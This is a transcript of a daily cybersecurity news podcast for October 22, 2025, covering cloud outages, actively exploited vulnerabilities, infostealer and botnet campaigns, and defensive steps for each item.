Subscribe
Share
Share
Embed
The BCM Daily Cyber News brings you clear, timely updates on threats, breaches, patches, and trends every day. Stay informed in minutes with focused audio built for busy professionals. Learn more and explore at BareMetalCyber.com.
This is today’s cyber news for October 22nd, 2025. You can also subscribe to the newsletter and view the archive of previous headlines at daily cyber dot news.
A big Amazon Web Services outage knocked popular apps offline and slowed logins, checkouts, and streaming. It matters because single-cloud designs turn a vendor hiccup into your downtime and customer frustration. Teams that rely on one region or manual failover are most exposed. Watch for elevated error rates in synthetic monitoring and spikes in user retries at login and checkout. Run an end-to-end failover test for your top customer journey and fix any gaps you find.
A recent Microsoft update broke Windows logins on machines that share a duplicate Security Identifier, or SID. That’s a business problem because authentication outages can paralyze support desks and delay work across entire departments. Cloned virtual desktop images and labs are the most exposed. Look for spikes in failed Kerberos logons and Group Policy errors in event logs. Identify duplicate-SID machines, remediate them, and add a SID-uniqueness check to your build process.
C I S A put an Oracle E-Business Suite flaw on its Known Exploited Vulnerabilities list, which means attackers are abusing it in the wild. This matters because Oracle E B S runs finance, procurement, and human resources, so impact is immediate and sensitive. Internet-reachable instances and those with thin reverse-proxy logging are most exposed. Watch for unusual outbound connections from E B S hosts and admin access at odd hours. Patch now, and if you can’t, restrict exposure, add W A F rules, and dig into recent logs.
A critical bug in T P-Link Omada gateways lets anyone run commands without logging in. That’s serious because these small-business edge devices control branch and guest networking, making them high-leverage footholds. Sites with internet-exposed management or default credentials are most exposed. Watch for unexpected reboots, configuration changes outside maintenance windows, and new outbound connections from the gateway. Patch immediately, and if you can’t today, lock management behind V P N, rotate credentials, and verify configs.
Two popular A I-assisted code editors, Cursor and Windsurf, ship embedded Chromium components with dozens of known bugs. It matters because developers browse docs and sign into services inside these tools, putting tokens and code at risk. Developer workstations and build hosts that delay updates are most exposed. Watch for unusual OAuth grants from developer machines and odd Git activity outside normal hours. Update the editors now and move sensitive browsing to a fully patched browser until you do.
Researchers at the Pwn2Own contest in Ireland demonstrated thirty-four zero-day exploits on day one. That matters because contest techniques often become blueprints for real attacks before patches fully land. Browsers, virtualization platforms, and enterprise apps are most exposed as vendors race to fix issues. Watch for spikes in browser or hypervisor crashes and new exploit signatures in your prevention tools. Prioritize patches tied to Pwn2Own disclosures and temporarily harden sandboxes or disable risky features where possible.
The Vidar information-stealing malware was rebuilt for speed and stealth with multithreaded collection. That matters because it can grab credentials, cookies, and wallet data before defenses react. Browsers on user workstations and finance or admin accounts are most exposed. Watch for sudden browser profile file access and outbound posts to first-seen domains. Block malvertising sources, harden browsers, and rotate sensitive tokens if you see signs of compromise.
A growing botnet called PolarEdge is compromising routers from Cisco, ASUS, QNAP, and Synology. It matters because those devices become launchpads for DDoS, proxies, and internal footholds. Home offices, small businesses, and branches with weak passwords or old firmware are most exposed. Watch for new open ports on the internet side and steady outbound traffic from the router itself. Update firmware, disable WAN-side admin, and replace end-of-life hardware that can’t be secured.
Apache Syncope, an identity and access management platform, has a remote code execution flaw on older versions. That’s a big deal because owning identity infrastructure lets attackers mint or escalate privileges across systems. Orgs with internet-exposed admin endpoints or weak authentication are most exposed. Watch for unexpected role escalations and outbound connections from the IAM host to unfamiliar addresses. Upgrade Syncope immediately and, if needed, disable risky script execution and lock admin paths behind a VPN while you patch.
A bug in the popular Node.js plugin “better-auth” lets attackers create API keys for any user. It matters because keys often bypass multi-factor checks and can perform privileged actions quietly. Apps that rely on these keys for admin tasks or provisioning are most exposed. Watch for API calls from new IP ranges using freshly created keys and spikes in key-creation events. Patch affected apps, rotate all keys created during exposure, and add server-side checks for sensitive actions.
CISA added actively exploited Apple device vulnerabilities to its Known Exploited list. That matters because unpatched iPhones, iPads, and Macs can be used for spyware, code execution, or sandbox escapes. Mixed fleets, BYOD programs, and executive devices are most exposed. Watch for devices that remain on old versions after the update window and unusual management profile changes. Enforce updates within seventy-two hours and revoke access to corporate apps for devices that stay out of date.
Microsoft shipped an out-of-band update to restore keyboard and mouse input in Windows Recovery. That’s important because if you cannot type in recovery, you cannot recover quickly during an incident. Enterprises that customize WinRE images or rely on offline repair are most exposed. Watch for failed offline repair attempts and help-desk tickets mentioning missing input in recovery screens. Apply the hotfix now and verify recovery workflows on representative hardware, including BitLocker unlock and network drivers.
Muji paused online sales after a ransomware hit on a third-party logistics partner disrupted order processing. It matters because a vendor’s downtime instantly becomes your revenue loss and customer frustration. Retailers and brands that depend on single fulfillment partners are most exposed. Watch for spikes in order failures, warehouse timeouts, and rapid EDI or API retries. Validate vendor ransomware readiness, including backups and recovery drills, and tighten SLAs around incident transparency.
Researchers found npm packages that install a command-and-control framework called AdaptixC2 on developer machines. That’s a problem because compromised build hosts can leak keys, poison releases, and spread silently. Teams with permissive package policies and broad CI/CD permissions are most exposed. Watch for unexpected outbound beacons from build agents and modifications to SSH keys or npm tokens. Quarantine affected hosts, rotate developer secrets, and pin packages to vetted, signed versions.
A threat group known as APT36 spoofed India’s National Informatics Centre emails to steal credentials. It matters because believable government-style notices drive clicks and open doors to sensitive portals. Public-sector users and contractors with access to internal systems are most exposed. Watch for sign-ins from new locations after NIC-themed emails and bursts of password resets. Enforce phishing-resistant MFA and block lookalike domains while reviewing recent access for lateral movement.
Analysts tracked “Cavalry Werewolf” using custom remote-access tools against energy, mining, and manufacturing targets. That’s serious because attackers blended spear-phishing with living-off-the-land techniques to persist near production environments. Organizations that monitor only office IT while ignoring engineering networks are most exposed. Watch for new remote admin tools on jump servers and timed data staging from OT-adjacent subnets. Segment engineering networks tightly, require just-in-time admin access, and restrict egress with detailed logging.
A long-running campaign is abusing Microsoft SQL Server to persist and quietly siphon data from governments and banks. It matters because database servers double as treasure vaults and launchpads when misconfigured. Instances with weak credentials, exposed management ports, or enabled xp_cmdshell are most exposed. Watch for new SQL Agent jobs, unusual long-running queries, and OS-level processes spawned by sqlservr.exe. Disable risky features, rotate credentials, and hunt for staging tables or outbound connections before rebuilding from clean backups.
That’s the BareMetalCyber Daily Brief for October 22nd, 2025. For more, visit BareMetalCyber dot com. You can also subscribe to the newsletter and view the archive of previous headlines at daily cyber dot news. We’re back tomorrow.